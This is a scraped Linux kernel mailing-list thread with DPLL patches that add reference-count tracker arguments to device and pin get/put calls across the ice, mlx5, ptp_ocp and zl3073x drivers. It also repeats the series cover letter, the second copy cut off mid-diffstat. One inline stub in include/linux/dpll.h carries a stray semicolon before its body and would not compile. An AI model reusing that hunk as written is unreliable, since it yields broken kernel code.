+++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop); + &pins[i].prop, NULL); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin); + dpll_pin_put(rclk->pin, NULL); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); } /** @@ -3271,7 +3271,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3287,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 3ea8a1766ae28..541d83e5d7183 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -438,7 +438,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -451,7 +451,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), - THIS_MODULE, &mlx5_dpll_pin_properties); + THIS_MODULE, &mlx5_dpll_pin_properties, + NULL); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -479,11 +480,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); err_free_mdpll: kfree(mdpll); return err; @@ -499,9 +500,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index 65fe05cac8c42..f39b3966b3e8c 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -4788,7 +4788,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4800,7 +4800,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) goto out; for (i = 0; i < OCP_SMA_NUM; i++) { - bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, &bp->sma[i].dpll_prop); + bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, + &bp->sma[i].dpll_prop, NULL); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4809,7 +4810,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); goto out_dpll; } } @@ -4819,9 +4820,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); out: ptp_ocp_detach(bp); out_disable: @@ -4842,11 +4843,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8fff048131f1d..5c80cdab0c180 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -18,6 +18,7 @@ struct dpll_device; struct dpll_pin; struct dpll_pin_esync; struct fwnode_handle; +struct ref_tracker; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -173,6 +174,12 @@ struct dpll_pin_properties { u32 phase_gran; }; +#ifdef CONFIG_DPLL_REFCNT_TRACKER +typedef struct ref_tracker *dpll_tracker; +#else +typedef struct {} dpll_tracker; +#endif + #define DPLL_DEVICE_CREATED 1 #define DPLL_DEVICE_DELETED 2 #define DPLL_DEVICE_CHANGED 3 @@ -205,7 +212,8 @@ size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -223,16 +231,17 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) } static inline struct dpll_pin * -fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +fwnode_dpll_pin_find(struct fwnode_handle *fwnode, dpll_tracker *tracker); { return NULL; } #endif struct dpll_device * -dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module); +dpll_device_get(u64 clock_id, u32 dev_driver_id, struct module *module, + dpll_tracker *tracker); -void dpll_device_put(struct dpll_device *dpll); +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker); int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, const struct dpll_device_ops *ops, void *priv); @@ -244,7 +253,7 @@ void dpll_device_unregister(struct dpll_device *dpll, struct dpll_pin * dpll_pin_get(u64 clock_id, u32 dev_driver_id, struct module *module, - const struct dpll_pin_properties *prop); + const struct dpll_pin_properties *prop, dpll_tracker *tracker); int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); @@ -252,7 +261,7 @@ int dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin, void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin, const struct dpll_pin_ops *ops, void *priv); -void dpll_pin_put(struct dpll_pin *pin); +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker); void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:36 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Update existing DPLL drivers to utilize the DPLL reference count tracking infrastructure. Add dpll_tracker fields to the drivers' internal device and pin structures. Pass pointers to these trackers when calling dpll_device_get/put() and dpll_pin_get/put(). This allows developers to inspect the specific references held by this driver via debugfs when CONFIG_DPLL_REFCNT_TRACKER is enabled, aiding in the debugging of resource leaks. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- drivers/dpll/zl3073x/dpll.c | 14 ++++++++------ drivers/dpll/zl3073x/dpll.h | 2 ++ drivers/net/ethernet/intel/ice/ice_dpll.c | 15 ++++++++------- drivers/net/ethernet/intel/ice/ice_dpll.h | 4 ++++ drivers/net/ethernet/mellanox/mlx5/core/dpll.c | 15 +++++++++------ drivers/ptp/ptp_ocp.c | 17 ++++++++++------- 6 files changed, 41 insertions(+), 26 deletions(-) diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 8788bcab7ec53..a99d143a7acde 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -29,6 +29,7 @@ * @list: this DPLL pin list entry * @dpll: DPLL the pin is registered to * @dpll_pin: pointer to registered dpll_pin + * @tracker: tracking object for the acquired reference * @label: package label * @dir: pin direction * @id: pin id @@ -44,6 +45,7 @@ struct zl3073x_dpll_pin { struct list_head list; struct zl3073x_dpll *dpll; struct dpll_pin *dpll_pin; + dpll_tracker tracker; char label[8]; enum dpll_pin_direction dir; u8 id; @@ -1480,7 +1482,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props, NULL); + &props->dpll_props, &pin->tracker); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1505,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1536,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin, NULL); + dpll_pin_put(pin->dpll_pin, &pin->tracker); pin->dpll_pin = NULL; } @@ -1708,7 +1710,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE, NULL); + THIS_MODULE, &zldpll->tracker); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1722,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } @@ -1743,7 +1745,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev, NULL); + dpll_device_put(zldpll->dpll_dev, &zldpll->tracker); zldpll->dpll_dev = NULL; } diff --git a/drivers/dpll/zl3073x/dpll.h b/drivers/dpll/zl3073x/dpll.h index e8c39b44b356c..c65c798c37927 100644 --- a/drivers/dpll/zl3073x/dpll.h +++ b/drivers/dpll/zl3073x/dpll.h @@ -18,6 +18,7 @@ * @check_count: periodic check counter * @phase_monitor: is phase offset monitor enabled * @dpll_dev: pointer to registered DPLL device + * @tracker: tracking object for the acquired reference * @lock_status: last saved DPLL lock status * @pins: list of pins * @change_work: device change notification work @@ -31,6 +32,7 @@ struct zl3073x_dpll { u8 check_count; bool phase_monitor; struct dpll_device *dpll_dev; + dpll_tracker tracker; enum dpll_lock_status lock_status; struct list_head pins; struct work_struct change_work; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 64b7b045ecd58..4eca62688d834 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop, NULL); + &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin, NULL); + dpll_pin_put(pins[i].pin, &pins[i].tracker); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin, NULL); + dpll_pin_put(rclk->pin, &rclk->tracker); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); } /** @@ -3271,7 +3271,8 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, + &d->tracker); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3288,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll, NULL); + dpll_device_put(d->dpll, &d->tracker); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index c0da03384ce91..63fac6510df6e 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -23,6 +23,7 @@ enum ice_dpll_pin_sw { /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin + * @tracker: reference count tracker * @idx: ice pin private idx * @num_parents: hols number of parent pins * @parent_idx: hold indexes of parent pins @@ -37,6 +38,7 @@ enum ice_dpll_pin_sw { struct ice_dpll_pin { struct dpll_pin *pin; struct ice_pf *pf; + dpll_tracker tracker; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -58,6 +60,7 @@ struct ice_dpll_pin { /** ice_dpll - store info required for DPLL control * @dpll: pointer to dpll dev * @pf: pointer to pf, which has registered the dpll_device + * @tracker: reference count tracker * @dpll_idx: index of dpll on the NIC * @input_idx: currently selected input index * @prev_input_idx: previously selected input index @@ -76,6 +79,7 @@ struct ice_dpll_pin { struct ice_dpll { struct dpll_device *dpll; struct ice_pf *pf; + dpll_tracker tracker; u8 dpll_idx; u8 input_idx; u8 prev_input_idx; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 541d83e5d7183..3981dd81d4c17 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -9,7 +9,9 @@ */ struct mlx5_dpll { struct dpll_device *dpll; + dpll_tracker dpll_tracker; struct dpll_pin *dpll_pin; + dpll_tracker pin_tracker; struct mlx5_core_dev *mdev; struct workqueue_struct *wq; struct delayed_work work; @@ -438,7 +440,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, + &mdpll->dpll_tracker); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -452,7 +455,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), THIS_MODULE, &mlx5_dpll_pin_properties, - NULL); + &mdpll->pin_tracker); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -480,11 +483,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); err_free_mdpll: kfree(mdpll); return err; @@ -500,9 +503,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin, NULL); + dpll_pin_put(mdpll->dpll_pin, &mdpll->pin_tracker); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll, NULL); + dpll_device_put(mdpll->dpll, &mdpll->dpll_tracker); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index f39b3966b3e8c..1b16a9c3d7fdc 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -285,6 +285,7 @@ struct ptp_ocp_sma_connector { u8 default_fcn; struct dpll_pin *dpll_pin; struct dpll_pin_properties dpll_prop; + dpll_tracker tracker; }; struct ocp_attr_group { @@ -383,6 +384,7 @@ struct ptp_ocp { struct ptp_ocp_sma_connector sma[OCP_SMA_NUM]; const struct ocp_sma_op *sma_op; struct dpll_device *dpll; + dpll_tracker tracker; int signals_nr; int freq_in_nr; }; @@ -4788,7 +4790,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, &bp->tracker); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4801,7 +4803,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) for (i = 0; i < OCP_SMA_NUM; i++) { bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, - &bp->sma[i].dpll_prop, NULL); + &bp->sma[i].dpll_prop, + &bp->sma[i].tracker); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4810,7 +4813,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); goto out_dpll; } } @@ -4820,9 +4823,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); out: ptp_ocp_detach(bp); out_disable: @@ -4843,11 +4846,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin, NULL); + dpll_pin_put(bp->sma[i].dpll_pin, &bp->sma[i].tracker); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll, NULL); + dpll_device_put(bp->dpll, &bp->tracker); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:37 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + 